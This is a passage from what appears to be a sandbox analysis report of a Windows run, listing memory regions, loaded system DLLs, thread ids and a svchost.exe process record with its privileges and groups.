pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4626 start_va = 0x280000 end_va = 0x283fff entry_point = 0x280000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 4627 start_va = 0x290000 end_va = 0x293fff entry_point = 0x290000 region_type = mapped_file name = "index.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 4628 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 4629 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4630 start_va = 0x1550000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001550000" filename = "" Region: id = 4631 start_va = 0x1730000 end_va = 0x182ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 4632 start_va = 0x1830000 end_va = 0x192ffff entry_point = 0x0 region_type = private name = "private_0x0000000001830000" filename = "" Region: id = 4633 start_va = 0x19d0000 end_va = 0x1acffff entry_point = 0x0 region_type = private name = "private_0x00000000019d0000" filename = "" Region: id = 4634 start_va = 0x1b30000 end_va = 0x1c2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 4635 start_va = 0x1c30000 end_va = 0x1d2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 4636 start_va = 0x1d30000 end_va = 0x2072fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d30000" filename = "" Region: id = 4637 start_va = 0x21a0000 end_va = 0x221ffff entry_point = 0x0 region_type = private name = "private_0x00000000021a0000" filename = "" Region: id = 4638 start_va = 0x2260000 end_va = 0x235ffff entry_point = 0x0 region_type = private name = "private_0x0000000002260000" filename = "" Region: id = 4639 start_va = 0x2520000 end_va = 0x252ffff entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 4640 start_va = 0x2540000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002540000" filename = "" Region: id = 4641 start_va = 0x2550000 end_va = 0x264ffff entry_point = 0x0 region_type = private name = "private_0x0000000002550000" filename = "" Region: id = 4642 start_va = 0x2750000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 4643 start_va = 0x2880000 end_va = 0x297ffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 4644 start_va = 0x77e10000 end_va = 0x77e12fff entry_point = 0x77e10000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4645 start_va = 0x7fef4d40000 end_va = 0x7fef4d5bfff entry_point = 0x7fef4d40000 region_type = mapped_file name = "rasman.dll" filename = "\\Windows\\System32\\rasman.dll" (normalized: "c:\\windows\\system32\\rasman.dll") Region: id = 4646 start_va = 0x7fef4d60000 end_va = 0x7fef4dc1fff entry_point = 0x7fef4d60000 region_type = mapped_file name = "rasapi32.dll" filename = "\\Windows\\System32\\rasapi32.dll" (normalized: "c:\\windows\\system32\\rasapi32.dll") Region: id = 4647 start_va = 0x7fef6570000 end_va = 0x7fef6580fff entry_point = 0x7fef6570000 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 4648 start_va = 0x7fef8a90000 end_va = 0x7fef8aa8fff entry_point = 0x7fef8a90000 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 4649 start_va = 0x7fef8ab0000 end_va = 0x7fef8ac4fff entry_point = 0x7fef8ab0000 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 4650 start_va = 0x7fef93b0000 end_va = 0x7fef93b8fff entry_point = 0x7fef93b0000 region_type = mapped_file name = "sensapi.dll" filename = "\\Windows\\System32\\SensApi.dll" (normalized: "c:\\windows\\system32\\sensapi.dll") Region: id = 4651 start_va = 0x7fefa530000 end_va = 0x7fefa74cfff entry_point = 0x7fefa530000 region_type = mapped_file name = "office.odf" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 4652 start_va = 0x7fefb670000 end_va = 0x7fefb67afff entry_point = 0x7fefb670000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4653 start_va = 0x7fefb680000 end_va = 0x7fefb6a6fff entry_point = 0x7fefb680000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4654 start_va = 0x7fefb800000 end_va = 0x7fefb814fff entry_point = 0x7fefb800000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 4655 start_va = 0x7fefbb00000 end_va = 0x7fefbb2cfff entry_point = 0x7fefbb00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4656 start_va = 0x7fefbc10000 end_va = 0x7fefbc17fff entry_point = 0x7fefbc10000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4657 start_va = 0x7fefc040000 end_va = 0x7fefc074fff entry_point = 0x7fefc040000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 4658 start_va = 0x7fefc690000 end_va = 0x7fefc883fff entry_point = 0x7fefc690000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 4659 start_va = 0x7fefd2a0000 end_va = 0x7fefd2fafff entry_point = 0x7fefd2a0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4660 start_va = 0x7fefda20000 end_va = 0x7fefda2afff entry_point = 0x7fefda20000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4661 start_va = 0x7fefda50000 end_va = 0x7fefda74fff entry_point = 0x7fefda50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4662 start_va = 0x7fefdb90000 end_va = 0x7fefdb9efff entry_point = 0x7fefdb90000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4663 start_va = 0x7fefee30000 end_va = 0x7fefee7cfff entry_point = 0x7fefee30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4664 start_va = 0x7fefee80000 end_va = 0x7feff0d8fff entry_point = 0x7fefee80000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4665 start_va = 0x7feff6e0000 end_va = 0x7feff857fff entry_point = 0x7feff6e0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4666 start_va = 0x7feff870000 end_va = 0x7feff999fff entry_point = 0x7feff870000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4667 start_va = 0x7feffe60000 end_va = 0x7feffeb1fff entry_point = 0x7feffe60000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 4668 start_va = 0x7feffec0000 end_va = 0x7feffec7fff entry_point = 0x7feffec0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4669 start_va = 0x7fffffa4000 end_va = 0x7fffffa5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa4000" filename = "" Region: id = 4670 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 4671 start_va = 0x7fffffa8000 end_va = 0x7fffffa9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa8000" filename = "" Region: id = 4672 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 4673 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 4674 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 4675 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 4676 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 4677 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 4678 start_va = 0x7fef96b0000 end_va = 0x7fef9702fff entry_point = 0x7fef96b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4679 start_va = 0x7fefb590000 end_va = 0x7fefb59afff entry_point = 0x7fefb590000 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 4680 start_va = 0x7fefce20000 end_va = 0x7fefce26fff entry_point = 0x7fefce20000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 4681 start_va = 0x7fefd410000 end_va = 0x7fefd416fff entry_point = 0x7fefd410000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 4682 start_va = 0x7fefd420000 end_va = 0x7fefd474fff entry_point = 0x7fefd420000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4691 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 4692 start_va = 0xcb0000 end_va = 0xcb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cb0000" filename = "" Region: id = 4693 start_va = 0xcc0000 end_va = 0xd3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 4694 start_va = 0x1490000 end_va = 0x154ffff entry_point = 0x1490000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4695 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4696 start_va = 0x7fef7190000 end_va = 0x7fef71f3fff entry_point = 0x7fef7190000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4697 start_va = 0x7fef7200000 end_va = 0x7fef7270fff entry_point = 0x7fef7200000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4698 start_va = 0x7fef9660000 end_va = 0x7fef9677fff entry_point = 0x7fef9660000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4699 start_va = 0x7fef9680000 end_va = 0x7fef9690fff entry_point = 0x7fef9680000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4700 start_va = 0x7fefd080000 end_va = 0x7fefd089fff entry_point = 0x7fefd080000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 4701 start_va = 0x7fefd480000 end_va = 0x7fefd496fff entry_point = 0x7fefd480000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4702 start_va = 0x7feff9a0000 end_va = 0x7feffa38fff entry_point = 0x7feff9a0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4785 start_va = 0xd50000 end_va = 0xd51fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d50000" filename = "" Region: id = 4786 start_va = 0x2080000 end_va = 0x217ffff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 4787 start_va = 0x23c0000 end_va = 0x24bffff entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 4788 start_va = 0x2980000 end_va = 0x2b7ffff entry_point = 0x0 region_type = private name = "private_0x0000000002980000" filename = "" Region: id = 4789 start_va = 0x2bc0000 end_va = 0x2cbffff entry_point = 0x0 region_type = private name = "private_0x0000000002bc0000" filename = "" Region: id = 4790 start_va = 0x2cd0000 end_va = 0x2dcffff entry_point = 0x0 region_type = private name = "private_0x0000000002cd0000" filename = "" Region: id = 4791 start_va = 0x2fa0000 end_va = 0x309ffff entry_point = 0x0 region_type = private name = "private_0x0000000002fa0000" filename = "" Region: id = 4792 start_va = 0x30a0000 end_va = 0x349ffff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 4793 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4794 start_va = 0x7fefcb80000 end_va = 0x7fefcbabfff entry_point = 0x7fefcb80000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4795 start_va = 0x7fefcf10000 end_va = 0x7fefcf2afff entry_point = 0x7fefcf10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4796 start_va = 0x7fefcf30000 end_va = 0x7fefcf4dfff entry_point = 0x7fefcf30000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4797 start_va = 0x7fefd0c0000 end_va = 0x7fefd10bfff entry_point = 0x7fefd0c0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4798 start_va = 0x7fefd180000 end_va = 0x7fefd1c6fff entry_point = 0x7fefd180000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4799 start_va = 0x7fefd210000 end_va = 0x7fefd266fff entry_point = 0x7fefd210000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4800 start_va = 0x7fefd5f0000 end_va = 0x7fefd611fff entry_point = 0x7fefd5f0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4801 start_va = 0x7fefd620000 end_va = 0x7fefd66dfff entry_point = 0x7fefd620000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4802 start_va = 0x7fefdb70000 end_va = 0x7fefdb83fff entry_point = 0x7fefdb70000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 4803 start_va = 0x7fffff9c000 end_va = 0x7fffff9dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9c000" filename = "" Region: id = 4804 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 4805 start_va = 0x7fffffa0000 end_va = 0x7fffffa1fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa0000" filename = "" Region: id = 4806 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Thread: id = 197 os_tid = 0x7f4 Thread: id = 254 os_tid = 0x878 Thread: id = 256 os_tid = 0x824 Thread: id = 257 os_tid = 0x8a0 Thread: id = 258 os_tid = 0x8a8 Thread: id = 261 os_tid = 0x85c Thread: id = 263 os_tid = 0x500 Thread: id = 265 os_tid = 0x95c Thread: id = 267 os_tid = 0x334 Thread: id = 271 os_tid = 0xbec Thread: id = 272 os_tid = 0xa5c Thread: id = 273 os_tid = 0xbf8 Thread: id = 277 os_tid = 0x504 Thread: id = 282 os_tid = 0x8f4 Thread: id = 292 os_tid = 0x404 Thread: id = 295 os_tid = 0x1c8 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7c6f000" os_pid = "0x11c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "29" os_parent_pid = "0x75c" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e1c3" [0xc000000f], "LOCAL" [0x7] Region: id = 4252 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4253 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 4254 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 4255 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4256 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4257 start_va = 0xc0000 end_va = 0xc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 4258 start_va = 0xd0000 end_va = 0xd0fff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 4259 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 4260 start_va = 0xf0000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 4261 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 4262 start_va = 0x270000 end_va = 0x270fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000270000" filename = "" Region: id = 4263 start_va = 0x280000 end_va = 0x290fff entry_point = 0x280000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 4264 start_va = 0x2a0000 end_va = 0x2a3fff entry_point = 0x2a0000 region_type = mapped_file name = "stdole2.tlb" filename = "\\Windows\\System32\\stdole2.tlb" (normalized: "c:\\windows\\system32\\stdole2.tlb") Region: id = 4265 start_va = 0x2b0000 end_va = 0x2b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 4266 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 4267 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 4268 start_va = 0x3d0000 end_va = 0x48ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 4269 start_va = 0x490000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 4270 start_va = 0x510000 end_va = 0x510fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 4271 start_va = 0x550000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 4272 start_va = 0x560000 end_va = 0x6e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 4273 start_va = 0x6f0000 end_va = 0x870fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006f0000" filename = "" Region: id = 4274 start_va = 0x880000 end_va = 0xc72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000880000" filename = "" Region: id = 4275 start_va = 0xc90000 end_va = 0xd0ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 4276 start_va = 0xd20000 end_va = 0xd9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d20000" filename = "" Region: id = 4277 start_va = 0xda0000 end_va = 0xe1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000da0000" filename = "" Region: id = 4278 start_va = 0xf10000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f10000" filename = "" Region: id = 4279 start_va = 0x1030000 end_va = 0x10affff entry_point = 0x0 region_type = private name = "private_0x0000000001030000" filename = "" Region: id = 4280 start_va = 0x10c0000 end_va = 0x138efff entry_point = 0x10c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 4281 start_va = 0x13c0000 end_va = 0x143ffff entry_point = 0x0 region_type = private name = "private_0x00000000013c0000" filename = "" Region: id = 4282 start_va = 0x1440000 end_va = 0x153ffff entry_point = 0x0 region_type = private name = "private_0x0000000001440000" filename = "" Region: id = 4283 start_va = 0x1650000 end_va = 0x174ffff entry_point = 0x0 region_type = private name = "private_0x0000000001650000" filename = "" Region: id = 4284 start_va = 0x17a0000 end_va = 0x181ffff entry_point = 0x0 region_type = private name = "private_0x00000000017a0000" filename = "" Region: id = 4285 start_va = 0x1820000 end_va = 0x189ffff entry_point = 0x0 region_type = private name = "private_0x0000000001820000" filename = "" Region: id = 4286 start_va = 0x18a0000 end_va = 0x195ffff entry_point = 0x18a0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 4287 start_va = 0x1990000 end_va = 0x199ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 4288 start_va = 0x1a30000 end_va = 0x1a3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a30000" filename = "" Region: id = 4289 start_va = 0x1b20000 end_va = 0x1b9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 4290 start_va = 0x1c30000 end_va = 0x1caffff entry_point = 0x0 region_type = private name = "private_0x0000000001c30000" filename = "" Region: id = 4291 start_va = 0x1cc0000 end_va = 0x1d3ffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 4292 start_va = 0x1d70000 end_va = 0x1deffff entry_point = 0x0 region_type = private name = "private_0x0000000001d70000" filename = "" Region: id = 4293 start_va = 0x1df0000 end_va = 0x1eeffff entry_point = 0x0 region_type = private name = "private_0x0000000001df0000" filename = "" Region: id = 4294 start_va = 0x1ef0000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 4295 start_va = 0x2070000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 4296 start_va = 0x2200000 end_va = 0x227ffff entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 4297 start_va = 0x2280000 end_va = 0x247ffff entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 4298 start_va = 0x745d0000 end_va = 0x745d2fff entry_point = 0x745d0000 region_type = mapped_file name = "sfc.dll" filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll") Region: id = 4299 start_va = 0x77a20000 end_va = 0x77b19fff entry_point = 0x77a20000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4300 start_va = 0x77b20000 end_va = 0x77c3efff entry_point = 0x77b20000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4301 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4302 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 4303 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 4304 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4305 start_va = 0xffc20000 end_va = 0xffc2afff entry_point = 0xffc20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 4306 start_va = 0x7fef58b0000 end_va = 0x7fef5987fff entry_point = 0x7fef58b0000 region_type = mapped_file name = "perftrack.dll" filename = "\\Windows\\System32\\perftrack.dll" (normalized: "c:\\windows\\system32\\perftrack.dll") Region: id = 4307 start_va = 0x7fef59c0000 end_va = 0x7fef59cbfff entry_point = 0x7fef59c0000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4308 start_va = 0x7fef5ff0000 end_va = 0x7fef6063fff entry_point = 0x7fef5ff0000 region_type = mapped_file name = "netprofm.dll" filename = 